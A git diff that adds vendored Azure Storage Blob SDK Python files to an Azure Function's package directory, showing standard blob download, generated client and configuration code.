= 0 + self._file_size = 0 + else: + process_storage_error(error) + + try: + if self.size == 0: + self._current_content = b"" + else: + self._current_content = process_content( + response, + self._initial_offset[0], + self._initial_offset[1], + self._encryption_options + ) + retry_active = False + except (requests.exceptions.ChunkedEncodingError, requests.exceptions.ConnectionError) as error: + retry_total -= 1 + if retry_total <= 0: + raise ServiceResponseError(error, error=error) + time.sleep(1) + + # get page ranges to optimize downloading sparse page blob + if response.properties.blob_type == 'PageBlob': + try: + page_ranges = self._clients.page_blob.get_page_ranges() + self._non_empty_ranges = get_page_ranges_result(page_ranges)[0] + # according to the REST API documentation: + # in a highly fragmented page blob with a large number of writes, + # a Get Page Ranges request can fail due to an internal server timeout. + # thus, if the page blob is not sparse, it's ok for it to fail + except HttpResponseError: + pass + + # If the file is small, the download is complete at this point. + # If file size is large, download the rest of the file in chunks. + if response.properties.size != self.size: + if self._request_options.get("modified_access_conditions"): + self._request_options["modified_access_conditions"].if_match = response.properties.etag + else: + self._download_complete = True + return response + + def chunks(self): + # type: () -> Iterator[bytes] + """Iterate over chunks in the download stream. + + :rtype: Iterator[bytes] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_hello_world.py + :start-after: [START download_a_blob_in_chunk] + :end-before: [END download_a_blob_in_chunk] + :language: python + :dedent: 12 + :caption: Download a blob using chunks(). + """ + if self.size == 0 or self._download_complete: + iter_downloader = None + else: + data_end = self._file_size + if self._end_range is not None: + # Use the end range index unless it is over the end of the file + data_end = min(self._file_size, self._end_range + 1) + iter_downloader = _ChunkDownloader( + client=self._clients.blob, + non_empty_ranges=self._non_empty_ranges, + total_size=self.size, + chunk_size=self._config.max_chunk_get_size, + current_progress=self._first_get_size, + start_range=self._initial_range[1] + 1, # start where the first download ended + end_range=data_end, + stream=None, + parallel=False, + validate_content=self._validate_content, + encryption_options=self._encryption_options, + use_location=self._location_mode, + **self._request_options + ) + return _ChunkIterator( + size=self.size, + content=self._current_content, + downloader=iter_downloader, + chunk_size=self._config.max_chunk_get_size) + + def readall(self): + # type: () -> Union[bytes, str] + """Download the contents of this blob. + + This operation is blocking until all data is downloaded. + :rtype: bytes or str + """ + stream = BytesIO() + self.readinto(stream) + data = stream.getvalue() + if self._encoding: + return data.decode(self._encoding) + return data + + def content_as_bytes(self, max_concurrency=1): + """Download the contents of this file. + + This operation is blocking until all data is downloaded. + + :keyword int max_concurrency: + The number of parallel connections with which to download. + :rtype: bytes + """ + warnings.warn( + "content_as_bytes is deprecated, use readall instead", + DeprecationWarning + ) + self._max_concurrency = max_concurrency + return self.readall() + + def content_as_text(self, max_concurrency=1, encoding="UTF-8"): + """Download the contents of this blob, and decode as text. + + This operation is blocking until all data is downloaded. + + :keyword int max_concurrency: + The number of parallel connections with which to download. + :param str encoding: + Test encoding to decode the downloaded bytes. Default is UTF-8. + :rtype: str + """ + warnings.warn( + "content_as_text is deprecated, use readall instead", + DeprecationWarning + ) + self._max_concurrency = max_concurrency + self._encoding = encoding + return self.readall() + + def readinto(self, stream): + """Download the contents of this file to a stream. + + :param stream: + The stream to download to. This can be an open file-handle, + or any writable stream. The stream must be seekable if the download + uses more than one parallel connection. + :returns: The number of bytes read. + :rtype: int + """ + # The stream must be seekable if parallel download is required + parallel = self._max_concurrency > 1 + if parallel: + error_message = "Target stream handle must be seekable." + if sys.version_info >= (3,) and not stream.seekable(): + raise ValueError(error_message) + + try: + stream.seek(stream.tell()) + except (NotImplementedError, AttributeError): + raise ValueError(error_message) + + # Write the content to the user stream + stream.write(self._current_content) + if self._progress_hook: + self._progress_hook(len(self._current_content), self.size) + + if self._download_complete: + return self.size + + data_end = self._file_size + if self._end_range is not None: + # Use the length unless it is over the end of the file + data_end = min(self._file_size, self._end_range + 1) + + downloader = _ChunkDownloader( + client=self._clients.blob, + non_empty_ranges=self._non_empty_ranges, + total_size=self.size, + chunk_size=self._config.max_chunk_get_size, + current_progress=self._first_get_size, + start_range=self._initial_range[1] + 1, # Start where the first download ended + end_range=data_end, + stream=stream, + parallel=parallel, + validate_content=self._validate_content, + encryption_options=self._encryption_options, + use_location=self._location_mode, + progress_hook=self._progress_hook, + **self._request_options + ) + if parallel: + import concurrent.futures + with concurrent.futures.ThreadPoolExecutor(self._max_concurrency) as executor: + list(executor.map( + with_current_context(downloader.process_chunk), + downloader.get_chunk_offsets() + )) + else: + for chunk in downloader.get_chunk_offsets(): + downloader.process_chunk(chunk) + return self.size + + def download_to_stream(self, stream, max_concurrency=1): + """Download the contents of this blob to a stream. + + :param stream: + The stream to download to. This can be an open file-handle, + or any writable stream. The stream must be seekable if the download + uses more than one parallel connection. + :returns: The properties of the downloaded blob. + :rtype: Any + """ + warnings.warn( + "download_to_stream is deprecated, use readinto instead", + DeprecationWarning + ) + self._max_concurrency = max_concurrency + self.readinto(stream) + return self.properties diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__init__.py new file mode 100644 index 0000000..689b3d3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__init__.py @@ -0,0 +1,15 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from ._azure_blob_storage import AzureBlobStorage +__all__ = ['AzureBlobStorage'] + +# `._patch.py` is used for handwritten extensions to the generated code +# Example: https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/customize_code/how-to-patch-sdk-code.md +from ._patch import patch_sdk +patch_sdk() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..f91f8a5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_azure_blob_storage.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_azure_blob_storage.cpython-39.pyc new file mode 100644 index 0000000..d7693ba Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_azure_blob_storage.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_configuration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_configuration.cpython-39.pyc new file mode 100644 index 0000000..50db621 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_configuration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_patch.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_patch.cpython-39.pyc new file mode 100644 index 0000000..ce2edf3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_patch.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_vendor.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_vendor.cpython-39.pyc new file mode 100644 index 0000000..96066fb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/__pycache__/_vendor.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_azure_blob_storage.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_azure_blob_storage.py new file mode 100644 index 0000000..dd4646a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_azure_blob_storage.py @@ -0,0 +1,111 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from copy import deepcopy +from typing import TYPE_CHECKING + +from msrest import Deserializer, Serializer + +from azure.core import PipelineClient + +from . import models +from ._configuration import AzureBlobStorageConfiguration +from .operations import AppendBlobOperations, BlobOperations, BlockBlobOperations, ContainerOperations, PageBlobOperations, ServiceOperations + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any + + from azure.core.rest import HttpRequest, HttpResponse + +class AzureBlobStorage(object): + """AzureBlobStorage. + + :ivar service: ServiceOperations operations + :vartype service: azure.storage.blob.operations.ServiceOperations + :ivar container: ContainerOperations operations + :vartype container: azure.storage.blob.operations.ContainerOperations + :ivar blob: BlobOperations operations + :vartype blob: azure.storage.blob.operations.BlobOperations + :ivar page_blob: PageBlobOperations operations + :vartype page_blob: azure.storage.blob.operations.PageBlobOperations + :ivar append_blob: AppendBlobOperations operations + :vartype append_blob: azure.storage.blob.operations.AppendBlobOperations + :ivar block_blob: BlockBlobOperations operations + :vartype block_blob: azure.storage.blob.operations.BlockBlobOperations + :param url: The URL of the service account, container, or blob that is the target of the + desired operation. + :type url: str + :param base_url: Service URL. Default value is "". + :type base_url: str + :keyword version: Specifies the version of the operation to use for this request. Default value + is "2021-04-10". Note that overriding this default value may result in unsupported behavior. + :paramtype version: str + """ + + def __init__( + self, + url, # type: str + base_url="", # type: str + **kwargs # type: Any + ): + # type: (...) -> None + self._config = AzureBlobStorageConfiguration(url=url, **kwargs) + self._client = PipelineClient(base_url=base_url, config=self._config, **kwargs) + + client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)} + self._serialize = Serializer(client_models) + self._deserialize = Deserializer(client_models) + self._serialize.client_side_validation = False + self.service = ServiceOperations(self._client, self._config, self._serialize, self._deserialize) + self.container = ContainerOperations(self._client, self._config, self._serialize, self._deserialize) + self.blob = BlobOperations(self._client, self._config, self._serialize, self._deserialize) + self.page_blob = PageBlobOperations(self._client, self._config, self._serialize, self._deserialize) + self.append_blob = AppendBlobOperations(self._client, self._config, self._serialize, self._deserialize) + self.block_blob = BlockBlobOperations(self._client, self._config, self._serialize, self._deserialize) + + + def _send_request( + self, + request, # type: HttpRequest + **kwargs # type: Any + ): + # type: (...) -> HttpResponse + """Runs the network request through the client's chained policies. + + >>> from azure.core.rest import HttpRequest + >>> request = HttpRequest("GET", "https://www.example.org/") + + >>> response = client._send_request(request) + + + For more information on this code flow, see https://aka.ms/azsdk/python/protocol/quickstart + + :param request: The network request you want to make. Required. + :type request: ~azure.core.rest.HttpRequest + :keyword bool stream: Whether the response payload will be streamed. Defaults to False. + :return: The response of your network call. Does not do error handling on your response. + :rtype: ~azure.core.rest.HttpResponse + """ + + request_copy = deepcopy(request) + request_copy.url = self._client.format_url(request_copy.url) + return self._client.send_request(request_copy, **kwargs) + + def close(self): + # type: () -> None + self._client.close() + + def __enter__(self): + # type: () -> AzureBlobStorage + self._client.__enter__() + return self + + def __exit__(self, *exc_details): + # type: (Any) -> None + self._client.__exit__(*exc_details) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_configuration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_configuration.py new file mode 100644 index 0000000..c9a2b7e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_configuration.py @@ -0,0 +1,64 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from typing import TYPE_CHECKING + +from azure.core.configuration import Configuration +from azure.core.pipeline import policies + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any + +VERSION = "unknown" + +class AzureBlobStorageConfiguration(Configuration): # pylint: disable=too-many-instance-attributes + """Configuration for AzureBlobStorage. + + Note that all parameters used to create this instance are saved as instance + attributes. + + :param url: The URL of the service account, container, or blob that is the target of the + desired operation. + :type url: str + :keyword version: Specifies the version of the operation to use for this request. Default value + is "2021-04-10". Note that overriding this default value may result in unsupported behavior. + :paramtype version: str + """ + + def __init__( + self, + url, # type: str + **kwargs # type: Any + ): + # type: (...) -> None + super(AzureBlobStorageConfiguration, self).__init__(**kwargs) + version = kwargs.pop('version', "2021-04-10") # type: str + + if url is None: + raise ValueError("Parameter 'url' must not be None.") + + self.url = url + self.version = version + kwargs.setdefault('sdk_moniker', 'azureblobstorage/{}'.format(VERSION)) + self._configure(**kwargs) + + def _configure( + self, + **kwargs # type: Any + ): + # type: (...) -> None + self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs) + self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs) + self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs) + self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs) + self.http_logging_policy = kwargs.get('http_logging_policy') or policies.HttpLoggingPolicy(**kwargs) + self.retry_policy = kwargs.get('retry_policy') or policies.RetryPolicy(**kwargs) + self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs) + self.redirect_policy = kwargs.get('redirect_policy') or policies.RedirectPolicy(**kwargs) + self.authentication_policy = kwargs.get('authentication_policy') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_patch.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_patch.py new file mode 100644 index 0000000..584913a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_patch.py @@ -0,0 +1,31 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +# This file is used for handwritten extensions to the generated code. Example: +# https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/customize_code/how-to-patch-sdk-code.md +def patch_sdk(): + pass \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_vendor.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_vendor.py new file mode 100644 index 0000000..48c9335 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/_vendor.py @@ -0,0 +1,27 @@ +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from azure.core.pipeline.transport import HttpRequest + +def _convert_request(request, files=None): + data = request.content if not files else None + request = HttpRequest(method=request.method, url=request.url, headers=request.headers, data=data) + if files: + request.set_formdata_body(files) + return request + +def _format_url_section(template, **kwargs): + components = template.split("/") + while components: + try: + return template.format(**kwargs) + except KeyError as key: + formatted_components = template.split("/") + components = [ + c for c in formatted_components if "{}".format(key.args[0]) not in c + ] + template = "/".join(components) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__init__.py new file mode 100644 index 0000000..689b3d3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__init__.py @@ -0,0 +1,15 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from ._azure_blob_storage import AzureBlobStorage +__all__ = ['AzureBlobStorage'] + +# `._patch.py` is used for handwritten extensions to the generated code +# Example: https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/customize_code/how-to-patch-sdk-code.md +from ._patch import patch_sdk +patch_sdk() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..e839dbd Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_azure_blob_storage.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_azure_blob_storage.cpython-39.pyc new file mode 100644 index 0000000..d9837c7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_azure_blob_storage.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_configuration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_configuration.cpython-39.pyc new file mode 100644 index 0000000..a2a9b60 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_configuration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_patch.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_patch.cpython-39.pyc new file mode 100644 index 0000000..94d02f3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/__pycache__/_patch.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_azure_blob_storage.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_azure_blob_storage.py new file mode 100644 index 0000000..65d075d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_azure_blob_storage.py @@ -0,0 +1,101 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from copy import deepcopy +from typing import Any, Awaitable + +from msrest import Deserializer, Serializer + +from azure.core import AsyncPipelineClient +from azure.core.rest import AsyncHttpResponse, HttpRequest + +from .. import models +from ._configuration import AzureBlobStorageConfiguration +from .operations import AppendBlobOperations, BlobOperations, BlockBlobOperations, ContainerOperations, PageBlobOperations, ServiceOperations + +class AzureBlobStorage: + """AzureBlobStorage. + + :ivar service: ServiceOperations operations + :vartype service: azure.storage.blob.aio.operations.ServiceOperations + :ivar container: ContainerOperations operations + :vartype container: azure.storage.blob.aio.operations.ContainerOperations + :ivar blob: BlobOperations operations + :vartype blob: azure.storage.blob.aio.operations.BlobOperations + :ivar page_blob: PageBlobOperations operations + :vartype page_blob: azure.storage.blob.aio.operations.PageBlobOperations + :ivar append_blob: AppendBlobOperations operations + :vartype append_blob: azure.storage.blob.aio.operations.AppendBlobOperations + :ivar block_blob: BlockBlobOperations operations + :vartype block_blob: azure.storage.blob.aio.operations.BlockBlobOperations + :param url: The URL of the service account, container, or blob that is the target of the + desired operation. + :type url: str + :param base_url: Service URL. Default value is "". + :type base_url: str + :keyword version: Specifies the version of the operation to use for this request. Default value + is "2021-04-10". Note that overriding this default value may result in unsupported behavior. + :paramtype version: str + """ + + def __init__( + self, + url: str, + base_url: str = "", + **kwargs: Any + ) -> None: + self._config = AzureBlobStorageConfiguration(url=url, **kwargs) + self._client = AsyncPipelineClient(base_url=base_url, config=self._config, **kwargs) + + client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)} + self._serialize = Serializer(client_models) + self._deserialize = Deserializer(client_models) + self._serialize.client_side_validation = False + self.service = ServiceOperations(self._client, self._config, self._serialize, self._deserialize) + self.container = ContainerOperations(self._client, self._config, self._serialize, self._deserialize) + self.blob = BlobOperations(self._client, self._config, self._serialize, self._deserialize) + self.page_blob = PageBlobOperations(self._client, self._config, self._serialize, self._deserialize) + self.append_blob = AppendBlobOperations(self._client, self._config, self._serialize, self._deserialize) + self.block_blob = BlockBlobOperations(self._client, self._config, self._serialize, self._deserialize) + + + def _send_request( + self, + request: HttpRequest, + **kwargs: Any + ) -> Awaitable[AsyncHttpResponse]: + """Runs the network request through the client's chained policies. + + >>> from azure.core.rest import HttpRequest + >>> request = HttpRequest("GET", "https://www.example.org/") + + >>> response = await client._send_request(request) + + + For more information on this code flow, see https://aka.ms/azsdk/python/protocol/quickstart + + :param request: The network request you want to make. Required. + :type request: ~azure.core.rest.HttpRequest + :keyword bool stream: Whether the response payload will be streamed. Defaults to False. + :return: The response of your network call. Does not do error handling on your response. + :rtype: ~azure.core.rest.AsyncHttpResponse + """ + + request_copy = deepcopy(request) + request_copy.url = self._client.format_url(request_copy.url) + return self._client.send_request(request_copy, **kwargs) + + async def close(self) -> None: + await self._client.close() + + async def __aenter__(self) -> "AzureBlobStorage": + await self._client.__aenter__() + return self + + async def __aexit__(self, *exc_details) -> None: + await self._client.__aexit__(*exc_details) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_configuration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_configuration.py new file mode 100644 index 0000000..51ca1cf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_configuration.py @@ -0,0 +1,58 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from typing import Any + +from azure.core.configuration import Configuration +from azure.core.pipeline import policies + +VERSION = "unknown" + +class AzureBlobStorageConfiguration(Configuration): # pylint: disable=too-many-instance-attributes + """Configuration for AzureBlobStorage. + + Note that all parameters used to create this instance are saved as instance + attributes. + + :param url: The URL of the service account, container, or blob that is the target of the + desired operation. + :type url: str + :keyword version: Specifies the version of the operation to use for this request. Default value + is "2021-04-10". Note that overriding this default value may result in unsupported behavior. + :paramtype version: str + """ + + def __init__( + self, + url: str, + **kwargs: Any + ) -> None: + super(AzureBlobStorageConfiguration, self).__init__(**kwargs) + version = kwargs.pop('version', "2021-04-10") # type: str + + if url is None: + raise ValueError("Parameter 'url' must not be None.") + + self.url = url + self.version = version + kwargs.setdefault('sdk_moniker', 'azureblobstorage/{}'.format(VERSION)) + self._configure(**kwargs) + + def _configure( + self, + **kwargs: Any + ) -> None: + self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs) + self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs) + self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs) + self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs) + self.http_logging_policy = kwargs.get('http_logging_policy') or policies.HttpLoggingPolicy(**kwargs) + self.retry_policy = kwargs.get('retry_policy') or policies.AsyncRetryPolicy(**kwargs) + self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs) + self.redirect_policy = kwargs.get('redirect_policy') or policies.AsyncRedirectPolicy(**kwargs) + self.authentication_policy = kwargs.get('authentication_policy') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_patch.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_patch.py new file mode 100644 index 0000000..584913a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/_patch.py @@ -0,0 +1,31 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +# This file is used for handwritten extensions to the generated code. Example: +# https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/customize_code/how-to-patch-sdk-code.md +def patch_sdk(): + pass \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__init__.py new file mode 100644 index 0000000..dfe59c6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__init__.py @@ -0,0 +1,23 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from ._service_operations import ServiceOperations +from ._container_operations import ContainerOperations +from ._blob_operations import BlobOperations +from ._page_blob_operations import PageBlobOperations +from ._append_blob_operations import AppendBlobOperations +from ._block_blob_operations import BlockBlobOperations + +__all__ = [ + 'ServiceOperations', + 'ContainerOperations', + 'BlobOperations', + 'PageBlobOperations', + 'AppendBlobOperations', + 'BlockBlobOperations', +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..e3ffaa3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/__pycache__/__init__.cpython-39.pyc differ diff --git 